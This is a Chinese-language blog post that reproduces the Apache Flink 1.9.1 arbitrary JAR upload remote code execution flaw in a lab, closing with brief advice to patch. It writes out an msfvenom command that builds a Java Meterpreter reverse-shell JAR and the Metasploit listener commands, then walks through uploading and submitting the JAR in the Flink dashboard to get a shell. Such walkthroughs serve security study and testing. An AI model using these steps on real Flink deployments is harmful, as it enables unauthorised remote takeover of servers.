溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊(cè)×
其他方式登錄
點(diǎn)擊 登錄注冊(cè) 即表示同意《億速云用戶服務(wù)條款》

Apache Flink任意Jar包上傳致RCE漏洞的示例分析

發(fā)布時(shí)間:2021-12-28 15:27:02 來源:億速云 閱讀:241 作者:小新 欄目:安全技術(shù)

這篇文章給大家分享的是有關(guān)Apache Flink任意Jar包上傳致RCE漏洞的示例分析的內(nèi)容。小編覺得挺實(shí)用的,因此分享給大家做個(gè)參考,一起跟隨小編過來看看吧。

0x01漏洞概述

攻擊者可直接在Apache Flink Dashboard頁面中上傳任意jar包,從而達(dá)到遠(yuǎn)程代碼執(zhí)行的目的

0x02影響范圍

到目前Apache Flink 1.9.1版本

0x03環(huán)境搭建

攻擊機(jī):kali

受害機(jī):ubuntu16

1. 安裝java8環(huán)境,自行百度教程

Apache Flink任意Jar包上傳致RCE漏洞的示例分析

2. 下載Flink1.9.1版本,然后解壓安裝包

Flink下載地址:https://archive.apache.org/dist/flink/flink-1.9.1/flink-1.9.1-bin-scala_2.11.tgz

解壓 tar -zxvf

Apache Flink任意Jar包上傳致RCE漏洞的示例分析

3. 進(jìn)入bin目錄運(yùn)行./start-cluster.sh啟動(dòng)環(huán)境

Apache Flink任意Jar包上傳致RCE漏洞的示例分析

4.在瀏覽器打開,出現(xiàn)以下界面表示安裝成功

Apache Flink任意Jar包上傳致RCE漏洞的示例分析

0x04漏洞復(fù)現(xiàn)

1. 首先使用kali生成jar的后門包

msfvenom -p java/meterpreter/reverse_tcp LHOST=IP LPORT=port -f jar > shell.jar

Apache Flink任意Jar包上傳致RCE漏洞的示例分析

2.使用msfconsole監(jiān)聽shell設(shè)置的端口

use exploit/multi/handler

set payload java/shell/reverse_tcp

Apache Flink任意Jar包上傳致RCE漏洞的示例分析

Apache Flink任意Jar包上傳致RCE漏洞的示例分析

3.run開啟監(jiān)聽

Apache Flink任意Jar包上傳致RCE漏洞的示例分析

4.把制作好的shell.jar包訪問目標(biāo)站點(diǎn)并上傳shell.jar

Apache Flink任意Jar包上傳致RCE漏洞的示例分析

5.點(diǎn)擊Submit觸發(fā)漏洞,反彈回了shell

Apache Flink任意Jar包上傳致RCE漏洞的示例分析

0x05修復(fù)建議

更新官方補(bǔ)丁或更新最新版本

感謝各位的閱讀!關(guān)于“Apache Flink任意Jar包上傳致RCE漏洞的示例分析”這篇文章就分享到這里了,希望以上內(nèi)容可以對(duì)大家有一定的幫助,讓大家可以學(xué)到更多知識(shí),如果覺得文章不錯(cuò),可以把它分享出去讓更多的人看到吧!

向AI問一下細(xì)節(jié)

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如果涉及侵權(quán)請(qǐng)聯(lián)系站長(zhǎng)郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI